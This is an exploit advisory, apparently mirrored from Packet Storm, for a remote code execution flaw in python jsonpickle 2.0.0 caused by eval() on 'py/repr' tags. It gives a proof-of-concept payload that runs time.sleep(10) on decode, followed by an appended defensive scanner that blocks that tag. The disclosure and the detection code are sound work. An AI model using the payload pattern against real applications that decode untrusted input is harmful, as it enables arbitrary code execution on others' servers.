Python jsonpickle 2.0.0 Remote Code Execution ≈ Packet Storm – Digitalmunition





Published on February 25th, 2021



# Exploit Title: python jsonpickle 2.0.0 – Remote Code Execution
# Date: 24-2-2021
# Vendor Homepage: https://jsonpickle.github.io
# Exploit Author: Adi Malyanker, Shay Reuven
# Software Link: https://github.com/jsonpickle/jsonpickle
# Version: 2.0.0
# Tested on: windows, linux

# Python is an open source language. The jsonpickle module is provided to convert objects into a serialized form
# and later recover the data back into an object. decode() is used to deserialize serialized strings.

# If malicious data is deserialized, it will execute arbitrary Python commands. It is also possible to make system() calls.
# The problem is in the inner function loadrepr, which calls eval() on every serialized string that carries a "py/repr" tag.

# The vulnerability exists from the first version up to the current version (the behaviour is kept for backward compatibility). No patch is provided yet.

# The payload was found during our research on deserialization functions.

# the pattern should be:
# {..{"py/repr": "<module>/<expression>"}..}

# example:
import jsonpickle

malicious = '{"1": {"py/repr": "time/time.sleep(10)"}, "2": {"py/id": 67}}'

# the command on the server side
some_parameter = jsonpickle.decode(malicious)
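A defensive pre-decode check, added here as an example and not part of the advisory: the untrusted string is parsed with the standard json module (which never executes code), the structure is walked, and any document carrying a "py/repr" tag is refused before it ever reaches jsonpickle.decode(). The `decoder` parameter and the sample inputs are constructed for illustration; in a deployment `decoder` would be jsonpickle.decode.

```python
"""Reject jsonpickle input that carries a "py/repr" tag before decoding it."""
import json

# Tag handled by jsonpickle's loadrepr(), which eval()s "module/expression".
# Extend this set if your deployment forbids further jsonpickle tags.
UNSAFE_TAGS = frozenset({"py/repr"})


def find_unsafe_tags(node, path="$"):
    """Return JSONPath-like locations of every unsafe tag in a parsed document."""
    hits = []
    if isinstance(node, dict):
        for key, value in node.items():
            if key in UNSAFE_TAGS:
                hits.append(f"{path}.{key}")
            # Recurse: tags nested inside containers must also be found.
            hits.extend(find_unsafe_tags(value, f"{path}.{key}"))
    elif isinstance(node, list):
        for i, item in enumerate(node):
            hits.extend(find_unsafe_tags(item, f"{path}[{i}]"))
    return hits


def scan(payload):
    """Parse with plain json (no code execution) and report unsafe tag locations."""
    return find_unsafe_tags(json.loads(payload))


def safe_decode(payload, decoder):
    """Refuse payloads with unsafe tags; otherwise hand the string to `decoder`.

    `decoder` is a hypothetical parameter standing in for jsonpickle.decode,
    so the check can be exercised without jsonpickle installed.
    """
    hits = scan(payload)
    if hits:
        raise ValueError(f"refusing jsonpickle input with unsafe tags at {hits}")
    return decoder(payload)


# Constructed sample inputs: the advisory's payload shape and a benign document.
MALICIOUS = '{"1": {"py/repr": "time/time.sleep(10)"}, "2": {"py/id": 67}}'
BENIGN = '{"user": {"name": "alice", "roles": ["reader", "editor"]}}'

if __name__ == "__main__":
    print(scan(MALICIOUS))  # ['$.1.py/repr']
    try:
        safe_decode(MALICIOUS, json.loads)
    except ValueError as exc:
        print("blocked:", exc)
    print(safe_decode(BENIGN, json.loads))
```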

